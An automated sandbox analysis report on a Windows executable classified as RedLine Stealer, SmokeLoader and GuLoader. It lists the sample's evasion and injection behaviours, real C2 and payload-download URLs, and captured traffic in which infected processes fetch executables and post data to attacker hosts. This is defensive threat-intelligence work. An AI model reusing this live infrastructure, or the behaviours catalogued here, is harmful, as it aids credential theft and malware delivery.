Windows Analysis Report fw8ex1BNek.exe

Overview

General Information

Sample Name: fw8ex1BNek.exe
Analysis ID: 542025
MD5: 6a4b078a500c92ae7bbf3563a49fb100
SHA1: 03005f11d47b9ef868df361c1603f33a9cee55fd
SHA256: a5acef0be0bd9993e756bb20a6b4e9fc2b1e819a02992255e4839d217ecf7258
Tags: exe, RedLineStealer

Detection

GuLoader RedLine SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Detected unpacking (overwrites its own PE header)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Yara detected GuLoader
Found malware configuration
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses known network protocols on non-standard ports
Machine Learning detection for sample
Injects a PE file into a foreign processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Checks if the current machine is a virtual machine (disk enumeration)
.NET source code references suspicious native API functions
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
.NET source code contains method to dynamically call methods (often used by packers)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Internet Provider seen in connection with other malware
Yara detected Credential Stealer
Contains functionality to call native functions
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
Detected TCP or UDP traffic on non-standard ports
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • fw8ex1BNek.exe (PID: 1624 cmdline: "C:\Users\user\Desktop\fw8ex1BNek.exe" MD5: 6A4B078A500C92AE7BBF3563A49FB100)
    • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • DB56.exe (PID: 3496 cmdline: C:\Users\user\AppData\Local\Temp\DB56.exe MD5: F2F8A2B12CB2E41FFBE135B6ED9B5B7C)
        • DB56.exe (PID: 4272 cmdline: C:\Users\user\AppData\Local\Temp\DB56.exe MD5: F2F8A2B12CB2E41FFBE135B6ED9B5B7C)
      • 4924.exe (PID: 6316 cmdline: C:\Users\user\AppData\Local\Temp\4924.exe MD5: 4C2D293F6A8F5AB1D869EFDFCD4AD41A)
      • 8CE5.exe (PID: 5548 cmdline: C:\Users\user\AppData\Local\Temp\8CE5.exe MD5: EC1105BE312FD184FFC9D7F272D64B87)
  • acgvitw (PID: 1752 cmdline: C:\Users\user\AppData\Roaming\acgvitw MD5: 6A4B078A500C92AE7BBF3563A49FB100)
  • cleanup

Malware Configuration

Threatname: RedLine

{"C2 url": "45.9.20.240:46257"}

Threatname: GuLoader

{"Payload URL": "http://185.112.83.8/InjectHollowing.bin"}

Threatname: SmokeLoader

{"C2 list": ["http://rcacademy.at/upload/", "http://e-lanpengeonline.com/upload/", "http://vjcmvz.cn/upload/", "http://galala.ru/upload/", "http://witra.ru/upload/"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000017.00000002.622456667.00000000021A5000.00000004.00000001.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
0000000B.00000002.481080184.0000000000661000.00000004.00020000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
00000005.00000000.405588327.0000000002E51000.00000020.00020000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
00000012.00000002.617991454.0000000000402000.00000040.00000001.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
00000000.00000002.427646956.00000000007C1000.00000004.00020000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.fw8ex1BNek.exe.400000.0.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
0.2.fw8ex1BNek.exe.630e50.1.raw.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
23.2.4924.exe.21e6516.2.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
23.2.4924.exe.2610000.6.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
23.2.4924.exe.2440000.4.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |

                      Sigma Overview

                      No Sigma rule has matched

                      Jbx Signature Overview

                      AV Detection:

                      Antivirus detection for URL or domain
                      Source: http://45.9.20.240:7769/Igno.exe | Avira URL Cloud: Label: malware
                      Source: http://185.112.83.8/install3.exe | Avira URL Cloud: Label: malware
                      Source: http://galala.ru/upload/ | Avira URL Cloud: Label: malware
                      Source: http://witra.ru/upload/ | Avira URL Cloud: Label: malware
                      Found malware configuration
                      Source: 00000017.00000002.622456667.00000000021A5000.00000004.00000001.sdmp | Malware Configuration Extractor: RedLine {"C2 url": "45.9.20.240:46257"}
                      Source: 0000000B.00000002.481062049.0000000000640000.00000004.00000001.sdmp | Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://rcacademy.at/upload/", "http://e-lanpengeonline.com/upload/", "http://vjcmvz.cn/upload/", "http://galala.ru/upload/", "http://witra.ru/upload/"]}
                      Source: 00000018.00000002.621930773.0000000002860000.00000040.00000001.sdmp | Malware Configuration Extractor: GuLoader {"Payload URL": "http://185.112.83.8/InjectHollowing.bin"}
                      Multi AV Scanner detection for submitted file
                      Source: fw8ex1BNek.exe | Virustotal: Detection: 39%
                      Source: fw8ex1BNek.exe | ReversingLabs: Detection: 37%
                      Multi AV Scanner detection for domain / URL
                      Source: rcacademy.at | Virustotal: Detection: 11%
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Local\Temp\8CE5.exe | ReversingLabs: Detection: 17%
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exe | ReversingLabs: Detection: 60%
                      Source: C:\Users\user\AppData\Roaming\acgvitw | ReversingLabs: Detection: 37%
                      Machine Learning detection for sample
                      Source: fw8ex1BNek.exe | Joe Sandbox ML: detected
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exe | Joe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\acgvitw | Joe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\4924.exe | Joe Sandbox ML: detected

                      Compliance:

                      Detected unpacking (overwrites its own PE header)
                      Source: C:\Users\user\AppData\Local\Temp\4924.exe | Unpacked PE file: 23.2.4924.exe.400000.0.unpack
                      Source: fw8ex1BNek.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\Desktop\fw8ex1BNek.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
                      Source: unknown | HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.6:49796 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 50.62.140.96:443 -> 192.168.2.6:49830 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 50.62.140.96:443 -> 192.168.2.6:49831 version: TLS 1.2
                      Source: Binary string: =bC:\xacozon\wujonemapafer\wivasekazifiki\zefixib.pdb source: fw8ex1BNek.exe, acgvitw.5.dr
                      Source: Binary string: C:\xacozon\wujonemapafer\wivasekazifiki\zefixib.pdb source: fw8ex1BNek.exe, acgvitw.5.dr
                      Source: Binary string: _.pdb source: 4924.exe, 00000017.00000002.622456667.00000000021A5000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.624238934.0000000002440000.00000004.00020000.sdmp
                      Source: Binary string: 3C:\wiwumife\cogecaviladeho\zirup.pdb source: 4924.exe.5.dr
                      Source: Binary string: C:\wiwumife\cogecaviladeho\zirup.pdb source: 4924.exe.5.dr

                      Networking:

                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\explorer.exe | Domain query: cdn.discordapp.com
                      Source: C:\Windows\explorer.exe | Domain query: www.bastinscustomfab.com
                      Source: C:\Windows\explorer.exe | Domain query: rcacademy.at
                      Source: C:\Windows\explorer.exe | Domain query: bastinscustomfab.com
                      Uses known network protocols on non-standard ports
                      Source: unknown | Network traffic detected: HTTP traffic on port 49850 -> 7769
                      Source: unknown | Network traffic detected: HTTP traffic on port 7769 -> 49850
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractor | URLs: http://185.112.83.8/InjectHollowing.bin
                      Source: Malware configuration extractor | URLs: http://rcacademy.at/upload/
                      Source: Malware configuration extractor | URLs: http://e-lanpengeonline.com/upload/
                      Source: Malware configuration extractor | URLs: http://vjcmvz.cn/upload/
                      Source: Malware configuration extractor | URLs: http://galala.ru/upload/
                      Source: Malware configuration extractor | URLs: http://witra.ru/upload/
                      Source: Joe Sandbox View | JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Content-Type: application/octet-stream | Last-Modified: Fri, 17 Dec 2021 07:07:38 GMT | Accept-Ranges: bytes | ETag: "8d927cc614f3d71:0" | Server: Microsoft-IIS/10.0 | Date: Sat, 18 Dec 2021 14:32:43 GMT | Content-Length: 94424
                      Source: global traffic | HTTP traffic detected: GET /attachments/921473641538027521/921473810035793960/Vorticism.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: cdn.discordapp.com
                      Source: global traffic | HTTP traffic detected: GET /veldolore/scc.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: bastinscustomfab.com
                      Source: global traffic | HTTP traffic detected: GET /veldolore/scc.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: www.bastinscustomfab.com | Cookie: PHPSESSID=905f1348cca402f214daeb63de69114c
                      Source: global traffic | HTTP traffic detected: POST /upload/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://sbhfij.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 167 | Host: rcacademy.at
                      Source: global traffic | HTTP traffic detected: POST /upload/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://uexckctm.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 317 | Host: rcacademy.at
                      Source: global traffic | HTTP traffic detected: POST /upload/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ydnswljr.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 162 | Host: rcacademy.at
                      Source: global traffic | HTTP traffic detected: POST /upload/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://vyedgkcsgg.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 349 | Host: rcacademy.at
                      Source: global traffic | HTTP traffic detected: POST /upload/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://rydxhqucb.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 293 | Host: rcacademy.at
                      Source: global traffic | HTTP traffic detected: POST /upload/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://uwbia.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 320 | Host: rcacademy.at
                      Source: global traffic | HTTP traffic detected: POST /upload/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://lwahbovc.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 254 | Host: rcacademy.at
                      Source: global traffic | HTTP traffic detected: POST /upload/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://uvqqrvitjv.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 195 | Host: rcacademy.at
                      Source: global traffic | HTTP traffic detected: POST /upload/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://pawqkjnqlq.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 282 | Host: rcacademy.at
                      Source: global traffic | HTTP traffic detected: POST /upload/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://vbely.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 158 | Host: rcacademy.at
                      Source: global traffic | HTTP traffic detected: POST /upload/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://wfquy.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 265 | Host: rcacademy.at
                      Source: global traffic | HTTP traffic detected: POST /upload/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://svlbtjow.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 203 | Host: rcacademy.at
                      Source: global traffic | HTTP traffic detected: POST /upload/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://nrenwf.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 176 | Host: rcacademy.at
                      Source: global traffic | HTTP traffic detected: POST /upload/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://kliyespolk.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 245 | Host: rcacademy.at
                      Source: global traffic | HTTP traffic detected: POST /upload/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://hjmjrvm.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 242 | Host: rcacademy.at
                      Source: global traffic | HTTP traffic detected: POST /upload/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://tvgdwnrq.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 196 | Host: rcacademy.at
                      Source: global traffic | HTTP traffic detected: POST /upload/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://bhqvtkcroe.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 154 | Host: rcacademy.at
                      Source: global traffic | HTTP traffic detected: POST /upload/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://wayrnqsako.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 306 | Host: rcacademy.at
                      Source: global traffic | HTTP traffic detected: POST /upload/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ayamwyb.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 243 | Host: rcacademy.at
                      Source: global traffic | HTTP traffic detected: POST /upload/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://gffroy.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 205 | Host: rcacademy.at
                      Source: global traffic | HTTP traffic detected: POST /upload/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ysuckj.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 359 | Host: rcacademy.at
                      Source: global traffic | HTTP traffic detected: POST /upload/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://qmchuh.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 318 | Host: rcacademy.at
                      Source: global traffic | HTTP traffic detected: POST /upload/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://tnsiunfk.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 318 | Host: rcacademy.at
                      Source: global traffic | HTTP traffic detected: POST /upload/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ydbdqcx.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 300 | Host: rcacademy.at
                      Source: global traffic | HTTP traffic detected: POST /upload/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://myjlsdvf.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 134 | Host: rcacademy.at
                      Source: global traffic | HTTP traffic detected: POST /upload/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://jfeippj.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 271 | Host: rcacademy.at
                      Source: global traffic | HTTP traffic detected: POST /upload/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://dgwuv.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 327 | Host: rcacademy.at
                      Source: global traffic | HTTP traffic detected: POST /upload/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://lvxkwka.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 361 | Host: rcacademy.at
                      Source: global traffic | HTTP traffic detected: GET /Igno.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: 45.9.20.240:7769
                      Source: global traffic | HTTP traffic detected: POST /upload/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://lbswig.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 353 | Host: rcacademy.at
                      Source: global traffic | HTTP traffic detected: POST /upload/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://rmxlxoqtyn.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 314 | Host: rcacademy.at
                      Source: global traffic | HTTP traffic detected: POST /upload/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://pwwgj.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 119 | Host: rcacademy.at
                      Source: global traffic | HTTP traffic detected: POST /upload/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://rwrqu.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 314 | Host: rcacademy.at
                      Source: global traffic | HTTP traffic detected: POST /upload/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://hetky.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 267 | Host: rcacademy.at
                      Source: global traffic | HTTP traffic detected: POST /upload/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://wadndxm.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 364 | Host: rcacademy.at
                      Source: global traffic | HTTP traffic detected: POST /upload/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://whrkpnnn.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 232 | Host: rcacademy.at
                      Source: global traffic | HTTP traffic detected: POST /upload/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://udjjtqdogg.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 185 | Host: rcacademy.at
                      Source: global traffic | HTTP traffic detected: POST /upload/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://cyvwwwlnbx.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 317 | Host: rcacademy.at
                      Source: global traffic | HTTP traffic detected: POST /upload/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://uwrfdbfbaa.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 309 | Host: rcacademy.at
                      Source: global traffic | HTTP traffic detected: GET /install3.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: 185.112.83.8
                      Source: global traffic | HTTP traffic detected: POST /upload/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://bvyrwnlgbc.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 134 | Host: rcacademy.at
                      Source: global traffic | HTTP traffic detected: POST /upload/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://vbwucidikt.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 308 | Host: rcacademy.at
                      Source: global traffic | HTTP traffic detected: POST /upload/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://hwmsuk.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 125 | Host: rcacademy.at
                      Source: global traffic | HTTP traffic detected: POST /upload/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://qkybqrxqpe.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 320 | Host: rcacademy.at
                      Source: global traffic | HTTP traffic detected: POST /upload/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://uaqwoemuq.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 296 | Host: rcacademy.at
                      Source: global traffic | HTTP traffic detected: POST /upload/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://nyexyommxu.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 218 | Host: rcacademy.at
                      Source: global traffic | HTTP traffic detected: POST /upload/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://jawmd.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 188 | Host: rcacademy.at
                      Source: global traffic | HTTP traffic detected: POST /upload/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://xefimpb.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 119 | Host: rcacademy.at
                      Source: global traffic | HTTP traffic detected: POST /upload/ HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://dppsna.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 241 | Host: rcacademy.at
                      Source: Joe Sandbox View | ASN Name: DEDIPATH-LLCUS DEDIPATH-LLCUS
                      Source: Joe Sandbox View | ASN Name: SUPERSERVERSDATACENTERRU SUPERSERVERSDATACENTERRU
                      Source: Joe Sandbox View | IP Address: 45.9.20.240 45.9.20.240
                      Source: Joe Sandbox View | IP Address: 190.117.75.91 190.117.75.91
                      Source: global traffic | TCP traffic: 192.168.2.6:49850 -> 45.9.20.240:7769
                      Source: global traffic | TCP traffic: 192.168.2.6:49865 -> 86.107.197.138:38133
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.631630583.0000000003363000.00000004.00000001.sdmp, DB56.exe, 00000012.00000002.630663215.0000000003190000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.632518246.0000000002EEC000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.631563085.0000000002CAC000.00000004.00000001.sdmp | String found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
                      Source: 8CE5.exe.5.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                      Source: 8CE5.exe.5.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                      Source: 8CE5.exe.5.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                      Source: 8CE5.exe.5.dr | String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                      Source: 8CE5.exe.5.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                      Source: 8CE5.exe.5.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                      Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
